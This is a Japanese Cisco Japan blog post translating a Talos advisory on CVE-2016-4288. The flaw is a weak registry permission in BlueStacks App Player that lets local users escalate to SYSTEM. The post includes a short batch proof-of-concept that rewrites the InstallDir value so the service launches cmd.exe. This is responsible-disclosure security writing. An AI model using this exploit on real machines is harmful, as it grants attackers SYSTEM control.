Cisco Japan Blog

注目の脆弱性:BlueStacks App Player の権限エスカレーション

1 min read



発見者:Cisco Talos の Marcin ‘Icewall’ Noga

Talos は BlueStacks App Player の脆弱性に関するアドバイザリをリリースしています。TALOS-2016-0124popup_icon/CVE-2016-4288)。BlueStacks App Player は Android アプリケーションを Windows PC や Macintosh コンピュータで実行できるようにするもので、一般的に、これらのプラットフォームで人気の Android ゲームを実行する目的で使用されています。

詳細

BlueStacks アプリケーションには、レジストリ キーの権限割り当てに脆弱性が存在します。BlueStack インストーラではデフォルトで、InstallDir 値を含むレジストリ キーに弱い権限(weak permission)が設定されています。この InstallDir 値は BlueStacks のサービス コンポーネントにより使用されます。このデフォルト設定によって悪意のあるユーザは、この値を変更することができるため、その結果、権限のエスカレーションを引き起こすことが可能になります。

脆弱な 「InstallDir」 値が存在する BlueStacks のレジストリ キーを確認してみましょう。

上記からわかるように、「Users」グループには、このキーに対してフル アクセス権限が与えられています。

BlueStacks サービスは、このレジストリからインストール ディレクトリの設定を取得し、そのインストール先から実行可能ファイル(HD-Network.exe)を実行します。InstallDir 値をユーザが特定した場所に設定することで、悪意のあるユーザは、選択したファイルを SYSTEM 権限で実行できるようになります。

エクスプロイト

@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM copy other files for execution
copy c:\windows\system32\cmd.exe HD-Network.exe
reg add “HKLM\SOFTWARE\BlueStacks” /f /v “InstallDir” /t REG_SZ /d c:\TALOS\
echo [+]Restore default values

まとめ

ゼロデイ脆弱性を発見し、責任を持って開示することは、日常的に使用されるソフトウェアの全体的なセキュリティの向上につながります。Cisco Talos では、攻撃者に悪用され得る問題や弱点を特定するためのプログラム的手法を開発することで、こうした取り組みに貢献しています。このようなアプローチにより、お客様がプラットフォームやソフトウェアを安全に使用できるようになります。また、シスコとしても、より安全な製品を開発するためのプロセス改善に向けた知見が得られます。

これは、ネットワーク トラフィックに関与しないローカルに潜む脆弱性であるため、 Talos ではこの問題に関する規則をリリースしていません。

タイムライン

2016-03-01 – 検出
2016-04-13 – 報告
2016-08-04 – パッチ適用
2016-08-04 – リリース

本稿は 2016年8月10日に Talos Grouppopup_icon のブログに投稿された「Vulnerability Spotlight: BlueStacks App Player Privilege Escalationpopup_icon」の抄訳です。

コメントを書く